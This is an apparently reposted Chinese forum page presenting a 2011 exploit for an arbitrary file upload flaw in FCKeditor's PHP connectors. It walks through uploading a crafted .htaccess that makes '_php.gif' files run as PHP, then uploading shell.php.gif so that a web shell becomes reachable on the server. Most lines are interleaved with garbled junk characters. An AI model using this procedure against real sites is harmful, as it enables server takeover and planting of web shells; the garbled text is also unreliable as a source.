FCKeditor所有php版本Upload上传漏洞2 a, ~ v# [& U) e& w. C
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
6 x" |) Z2 F( q减小字体 增大字体% G5 v: p% R% r/ j1 f
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability" [. B9 G+ u8 I8 @0 i
[+] Date: 2011+ M1 D: U1 I6 H/ M/ m
[+] Author : sinesafe.cn
) B8 }* l7 u8 K) b5 F$ X* y[+] Website : WwW.sinesafe.cn! ] [* |/ F" z- L/ ^3 y
———————————————————
5 _7 i S ?. x$ Y2 T/ k% i1.create a htaccess file:
/ v R6 j$ V. {) i ncode:
" d# H8 N" d- d( f7 X, o4 }<FilesMatch “_php.gif”>, Z2 C$ |$ p8 G; a
SetHandler application/x-httpd-php! S5 a4 Y, s7 x: b$ w' @
</FilesMatch>' D, M6 _& s! E- _
+ b+ h5 ~! ]. y" [( R2.Now upload this htaccess with FCKeditor.
( T* n: u: f9 P, h$ g# @# G" @7 ?* R5 d, i; |* \0 L. _% W
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
7 S& A6 c$ q' u) U' C+ c/ ]/ ^4 ?+ R9 ~8 V1 d; f; A+ m0 o
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html( x A& T0 k. g$ r+ ]
4 X+ c' _5 N, |7 ~+ R———————————————————————————————-9 R; i. O% O9 s$ N* h% |
3.Now upload shell.php.gif with FCKeditor.. ?* q5 c3 E) l; q: b2 o& j; p
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
* r- p. [# S( D* L- e5.http://www.sinesafe.cn/anything/shell_php.gif1 a8 _6 d7 y E7 S
6.Now shell is available from server. |
6 y3 p5 L6 J6 p7 z5 r$ m
- ?) q' j* U' Z/ c0 m# b
9 i9 ]" z: n1 V5 S |
发表于 2013-10-27 17:25:21
收藏
支持
反对